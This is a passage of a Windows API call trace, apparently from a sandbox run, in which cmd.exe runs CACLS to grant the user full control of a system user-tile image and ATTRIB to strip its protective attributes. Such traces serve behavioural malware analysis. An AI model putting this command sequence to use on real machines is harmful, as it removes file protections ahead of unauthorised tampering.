lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x40, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x1, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x1, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x0, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x9, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x9, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x9, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegCloseKey (hKey=0x40) returned 0x0 [0189.138] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886397 [0189.138] srand (_Seed=0x5b886397) [0189.138] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"" [0189.138] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"" [0189.138] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.139] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0189.139] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.139] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.139] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.139] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0189.139] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0189.139] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0189.139] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0189.139] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0189.139] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0189.139] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0189.139] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0189.139] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0189.139] GetEnvironmentStringsW () returned 0x412458* [0189.139] FreeEnvironmentStringsW (penv=0x412458) returned 1 [0189.139] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.139] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.139] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0189.139] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0189.139] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0189.139] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0189.139] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0189.139] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0189.139] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0189.140] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0189.140] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efb30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.140] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efb30, lpFilePart=0x2efb2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efb2c*="Desktop") returned 0x18 [0189.140] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.140] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef8ac | out: lpFindFileData=0x2ef8ac) returned 0x410ae8 [0189.140] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0189.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef8ac | out: lpFindFileData=0x2ef8ac) returned 0x410ae8 [0189.140] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0189.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef8ac | out: lpFindFileData=0x2ef8ac) returned 0x410ae8 [0189.140] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0189.140] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.140] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0189.140] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0189.141] GetEnvironmentStringsW () returned 0x410308* [0189.141] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0189.141] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.141] GetConsoleOutputCP () returned 0x1b5 [0189.141] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.141] GetUserDefaultLCID () returned 0x409 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efc70, cchData=128 | out: lpLCData="0") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efc70, cchData=128 | out: lpLCData="0") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efc70, cchData=128 | out: lpLCData="1") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0189.142] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0189.143] GetConsoleTitleW (in: lpConsoleTitle=0x4009b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.143] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0189.143] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0189.143] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0189.144] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0189.144] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0189.145] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0189.145] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0189.145] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0189.145] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0189.145] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0189.145] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0189.147] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0189.147] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0189.147] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0189.147] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0189.147] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0189.147] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0189.147] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0189.149] GetConsoleTitleW (in: lpConsoleTitle=0x2ef904, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.150] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.150] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.150] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.150] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.150] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.150] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.150] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.150] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.150] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.150] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.150] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.150] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.150] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.150] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.150] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.150] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.150] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.150] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.150] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.150] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.150] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.150] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.150] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.150] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.150] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.150] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.150] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.150] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.150] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.150] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.150] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.150] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.150] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.150] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.150] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.151] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.151] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.151] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.151] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.151] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.151] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.151] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.151] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.151] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.151] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.151] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.151] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.151] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.151] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.151] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.151] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.151] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.151] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.151] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.151] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.151] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.151] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.151] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.151] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.151] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.151] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.151] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.151] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.151] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.151] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.151] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.151] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.151] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.151] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0189.151] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0189.151] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0189.152] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0189.152] SetErrorMode (uMode=0x0) returned 0x0 [0189.152] SetErrorMode (uMode=0x1) returned 0x0 [0189.152] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x411e98, lpFilePart=0x2ef424 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef424*="Desktop") returned 0x18 [0189.152] SetErrorMode (uMode=0x0) returned 0x1 [0189.152] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.152] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.157] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.158] GetLastError () returned 0x2 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.158] GetLastError () returned 0x2 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0x412180 [0189.158] FindClose (in: hFindFile=0x412180 | out: hFindFile=0x412180) returned 1 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.158] GetLastError () returned 0x2 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0x412180 [0189.159] FindClose (in: hFindFile=0x412180 | out: hFindFile=0x412180) returned 1 [0189.159] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.159] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.159] GetConsoleTitleW (in: lpConsoleTitle=0x2ef698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.159] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef520, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef5e8 | out: lpAttributeList=0x2ef520, lpSize=0x2ef5e8) returned 1 [0189.159] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef520, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef5e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef520, lpPreviousValue=0x0) returned 1 [0189.159] GetStartupInfoW (in: lpStartupInfo=0x2ef4dc | out: lpStartupInfo=0x2ef4dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.159] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.160] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef57c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef5c8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2ef5c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf98, dwThreadId=0x7ec)) returned 1 [0189.162] CloseHandle (hObject=0x4c) returned 1 [0189.162] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.162] GetEnvironmentStringsW () returned 0x410308* [0189.162] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0189.163] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0189.196] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef4bc | out: lpExitCode=0x2ef4bc*=0x0) returned 1 [0189.196] CloseHandle (hObject=0x50) returned 1 [0189.196] _vsnwprintf (in: _Buffer=0x2ef604, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef4c8 | out: _Buffer="00000000") returned 8 [0189.196] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.196] GetEnvironmentStringsW () returned 0x412410* [0189.196] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.196] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.196] GetEnvironmentStringsW () returned 0x412410* [0189.196] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.196] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef520 | out: lpAttributeList=0x2ef520) [0189.196] GetConsoleTitleW (in: lpConsoleTitle=0x2ef904, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.197] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.197] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.197] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.197] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.197] GetLastError () returned 0x2 [0189.197] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.197] GetLastError () returned 0x2 [0189.197] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0x40e4d8 [0189.197] FindClose (in: hFindFile=0x40e4d8 | out: hFindFile=0x40e4d8) returned 1 [0189.197] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.198] GetLastError () returned 0x2 [0189.198] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0x40e4d8 [0189.198] FindClose (in: hFindFile=0x40e4d8 | out: hFindFile=0x40e4d8) returned 1 [0189.198] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.198] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.198] GetConsoleTitleW (in: lpConsoleTitle=0x2ef698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.198] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef520, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef5e8 | out: lpAttributeList=0x2ef520, lpSize=0x2ef5e8) returned 1 [0189.198] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef520, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef5e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef520, lpPreviousValue=0x0) returned 1 [0189.198] GetStartupInfoW (in: lpStartupInfo=0x2ef4dc | out: lpStartupInfo=0x2ef4dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.198] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.198] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, 